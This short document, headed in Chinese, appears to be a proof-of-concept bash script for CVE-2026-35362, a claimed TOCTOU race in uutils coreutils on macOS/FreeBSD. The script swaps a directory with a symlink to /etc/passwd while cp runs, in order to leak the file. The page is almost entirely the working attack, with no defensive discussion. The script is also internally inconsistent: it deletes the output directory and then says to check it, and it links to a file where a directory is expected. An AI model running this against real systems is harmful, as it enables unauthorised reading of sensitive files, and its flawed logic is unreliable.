CVE-2026-35362 uutils coreutils 非Linux系统TOCTOU漏洞

#!/bin/bash # PoC for CVE-2026-35362: TOCTOU race condition in uutils coreutils on non-Linux systems TARGET_DIR="safe_dir" SYMLINK_TARGET="/etc/passwd" # Target sensitive file SYMLINK_NAME="link_dir" DESTINATION="output_dir" # Setup environment mkdir -p "$TARGET_DIR" mkdir -p "$DESTINATION" ln -s "$SYMLINK_TARGET" "$SYMLINK_NAME" echo "[+] Starting race condition simulation..." # Attacker process: Swap directories rapidly to exploit the window while true; do mv "$TARGET_DIR" "tmp_dir" mv "$SYMLINK_NAME" "$TARGET_DIR" mv "tmp_dir" "$SYMLINK_NAME" done & ATTACKER_PID=$! # Victim process: Run uutils command (e.g., cp) repeatedly echo "[+] Running vulnerable uutils command..." for i in {1..100}; do # On macOS/FreeBSD, this might follow the symlink to /etc/passwd # due to missing safe_traversal protections uutils-cp -r "$TARGET_DIR"/* "$DESTINATION" 2>/dev/null & done # Cleanup sleep 2 kill $ATTACKER_PID 2>/dev/null rm -rf "$TARGET_DIR" "$SYMLINK_NAME" "tmp_dir" "$DESTINATION" echo "[+] Check $DESTINATION for potential sensitive file leakage."